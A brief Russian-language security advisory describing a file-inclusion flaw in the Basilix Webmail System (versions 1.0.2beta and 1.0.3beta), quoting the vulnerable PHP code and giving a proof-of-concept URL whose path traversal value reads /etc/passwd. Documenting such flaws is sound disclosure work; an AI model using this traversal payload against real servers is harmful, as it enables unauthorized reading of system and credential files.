Security Lab

Уязвимость в Basilix Webmail System

Дата публикации:09.07.2001
Дата изменения:17.10.2006
Всего просмотров:1351
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание:

Basilix Webmail System – простая система webmail, написанная на PHP+MySQL. В ней найдена уязвимость, присутствующая в скрипте basilix.php3:



$file = $request_id["$RequestID"];

if($file == "") exit();

include($BSX_FILESDIR . "/" . $file);

Как видно, срипт запускает файл, имя которого берется из массива request_id. Легко меняя эту строку, атакующий может прочитать любой файл, если на него будут соответствующие права:

http://beta.basilix.org/basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=blah&password=blah



Уязвимость найдена в версиях:

Basilix Webmail System 1.0.2beta

Basilix Webmail System 1.0.3beta